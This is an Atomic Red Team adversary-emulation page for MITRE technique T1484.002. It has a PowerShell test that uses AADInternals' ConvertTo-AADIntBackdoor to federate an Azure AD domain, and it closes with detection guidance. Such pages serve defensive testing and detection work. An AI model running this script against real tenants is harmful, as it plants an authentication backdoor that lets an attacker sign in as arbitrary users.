# T1484.002 - Domain Trust Modification
Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.

Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) 

## Atomic Tests

### Atomic Test #1 - Add Federation to Azure AD
Add a new federated domain to Azure AD using PowerShell.
The malicious domain to be federated must be configured beforehand (outside of the scope of this test):
    1. Open Azure Portal
    2. Add a new "custom domain name"
    3. Verify the domain by following instructions (i.e. create the requested DNS record)

**Supported Platforms:** azure-ad
#### Dependencies:  Run with `powershell`!
##### Description: AzureAD and AADInternals Powershell modules must be installed.

##### Check Prereq Commands:
```powershell
if ((Get-Module -ListAvailable -Name AzureAD) -And (Get-Module -ListAvailable -Name AADInternals)) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Install-Module -Name AzureAD -Force
Install-Module -Name AADInternals -Force

```

In [ ]:
Invoke-AtomicTest T1484.002 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Import-Module AzureAD
Import-Module AADInternals

$PWord = ConvertTo-SecureString -String "iamthebatman" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "bruce.wayne@contosocloud.com", $Pword

try {
  Connect-AzureAD -Credential $Credential -ErrorAction Stop > $null
}
catch {
  Write-Host "Error: AzureAD could not connect"
  exit 1
}

try {
  $domain = Get-AzureADDomain -Name "contoso.com"
}
catch {
  Write-Host "Error: domain ""contoso.com"" not found"
  exit 1
}
if (-Not $domain.IsVerified) {
  Write-Host "Error: domain ""contoso.com"" not verified"
  exit 1
}

if ($domain.AuthenticationType -eq "Federated") {
  Write-Host "Error: domain ""contoso.com"" already federated. Try with a different domain or re-create it before."
  exit 1
}

$at = Get-AADIntAccessTokenForAADGraph -Credentials $Credential
if (-Not $at) {
  Write-Host "Error: AADInternals could not connect"
  exit 1
}

$new = ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "contoso.com"
if ($new) {
  Write-Host "Federation successfully added to Azure AD"
  Write-Host $new
}
else {
  Write-Host "The federation setup failed"
}

Write-Host "End of federation configuration."
```

In [ ]:
Invoke-AtomicTest T1484.002 -TestNumbers 1

## Detection
Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes <code>Set federation settings on domain</code> and <code>Set domain authentication</code>.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)

Monitor for PowerShell commands such as: <code>Update-MSOLFederatedDomain –DomainName: "Federated Domain Name"</code>, or <code>Update-MSOLFederatedDomain –DomainName: "Federated Domain Name" –supportmultipledomain</code>.(Citation: Microsoft - Update or Repair Federated domain)